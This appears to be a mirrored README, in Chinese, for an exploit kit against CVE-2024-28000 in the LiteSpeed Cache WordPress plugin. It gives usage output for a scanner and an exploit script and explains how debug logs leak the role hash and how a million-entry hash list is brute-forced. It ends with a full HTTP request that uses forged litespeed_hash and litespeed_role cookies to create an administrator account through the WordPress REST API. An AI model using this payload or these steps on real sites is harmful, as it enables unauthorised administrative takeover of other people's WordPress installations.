Share
## https://sploitus.com/exploit?id=F666A410-B73A-5730-A790-299D7201E746
# LiteSpeed Cache Privilege Escalation Exp

## CVE-2024-28000_Scan.py
- 该脚本首先会识别版本,判断是否为易损版本,后尝试确认log文件是否存在,若存在,则会尝试发包后再次请求log文件尝试查找hash泄露,若LiteSpeed启用debug,则有可能泄露正确Hash
```
usage: CVE-2024-28000_Scan.py [-h] [-f F] [-t T] [-p PROXY]

CVE-2024-28000 Scan

optional arguments:
  -h, --help            show this help message and exit
  -f F                  File list
  -t T                  Scan thread
  -p PROXY, --proxy PROXY
                        Example: socks5://127.0.0.1:10808
```
示例:
```
09/08/24 16:30:38.219 [0.0.0.0:26008 1 TG9] 💓 ------POST HTTP/1.1 (HTTPS)  /wp-json/wp/v2/users
09/08/24 16:30:38.219 [0.0.0.0:26008 1 TG9] Query String: 
09/08/24 16:30:38.231 [0.0.0.0:26008 1 TG9] [Router] starting role validation
09/08/24 16:30:38.232 [0.0.0.0:26008 1 TG9] [Router] hash not match zasws5 != pkHrfD
09/08/24 16:30:38.232 [0.0.0.0:26008 1 TG9] [Router] get_role: 
09/08/24 16:30:38.241 [0.0.0.0:26008 1 TG9] [Optm] init
```
若LiteSpeed启用debug,则可能看到类似的上面的日志,其中pkHrfD则为正确Hash
## CVE-2024-28000_Exploit.py
- 经测试 Python和PHP生成的Hash是有差异的,故Hash列表并不能用Python模拟生成,Hash_list.txt文件为php生成的1000000个Hash,所以理论上遍历最高1000000次则可以遍历到正确Hash
```
usage: CVE-2024-28000_Exploit.py [-h] [-u U] [-t T] [-d D] [-p PROXY]

CVE-2024-28000

optional arguments:
  -h, --help            show this help message and exit
  -u U                  url
  -t T                  Scan thread
  -d D                  Dict list
  -p PROXY, --proxy PROXY
                        Example: socks5://127.0.0.1:10808
```
- -d参数则为Hash列表 -u为url -t为线程数,线程不建议过高

## 测试
- 在靶场测试是可以成功遍历出Hash,并且重装五遍都已经确认Hash是在生成的Hash列表中的,但是多种方面表面实战利用成功率较低
- 在成功找到正确Hash后可用下面的数据包添加admin用户

```
POST /wp-json/wp/v2/users HTTP/2
Host: xxx.com
User-Agent: python-requests/2.28.1
Accept-Encoding: gzip, deflate, br
Accept: */*
Cookie: litespeed_hash=正确Hash; litespeed_role=1
Content-Length: 122
Content-Type: application/json

{"username": "username", "password": "password", "email": "xadminx@example.com", "roles": ["administrator"]}
```